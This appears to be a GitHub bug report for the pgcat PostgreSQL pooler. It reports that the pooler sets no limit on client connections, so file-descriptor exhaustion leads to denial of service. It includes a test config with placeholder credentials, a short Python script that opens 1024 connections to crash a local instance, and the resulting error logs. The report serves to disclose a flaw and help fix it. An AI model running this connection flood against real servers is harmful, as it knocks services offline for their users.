No Client Connection Limits
Opened this issue · 0 comments
Describe the bug
Linux places a max on the number of files a process can have open at a given time. This limit can be seen using the command ulimit -n. I believe the default for most distros is 1024 (this is the case on my NixOS setup) but this number is very low and can be increased.
The problem with this with regard to pgcat is that every time a client opens a connection pgcat opens a new file. I do not believe (please correct me if I am wrong about this) there is a way to limit client connections in pgbouncer and because of this it is possible for any client to DoS the pgcat server.
To Reproduce
Verify max file descriptors
ulimit -n[general]
host = "0.0.0.0"
port = 6433
admin_username = "pgcat"
admin_password = "pgcat"
[pools.pgml.users.0]
username = "postgres"
password = "postgres"
pool_size = 10
min_pool_size = 1
pool_mode = "transaction"
[pools.pgml.shards.0]
servers = [
["127.0.0.1", 9876, "primary"]
]
database = "postgres"Python script to DoS pgcat server
import psycopg2
def connect() -> None:
pg_connection_dict = {
'dbname': 'pgml',
'password': 'postgres',
'user': 'postgres',
'port': 6433,
'host': '127.0.0.1'
}
return psycopg2.connect(**pg_connection_dict)
def ulimit_test():
connections = []
for _ in range(1024):
conn = connect()
connections.append(conn)
for conn in connections:
conn.close()
def main() -> None:
ulimit_test()
if __name__ == '__main__':
main()pgcat error logs on being DOS'd
...
2024-09-05T18:29:11.673340Z ERROR ThreadId(01) pgcat: Os { code: 24, kind: Uncategorized, message: "Too many open files" }
2024-09-05T18:29:11.673376Z ERROR ThreadId(01) pgcat: Os { code: 24, kind: Uncategorized, message: "Too many open files" }
2024-09-05T18:29:11.673398Z ERROR ThreadId(01) pgcat: Os { code: 24, kind: Uncategorized, message: "Too many open files" }
...
Expected behavior
There should be a way to limit client connections in pgbouncer to prevent the possibility of being DOS'd.
Desktop (please complete the following information):
- OS: Rocky9 Linux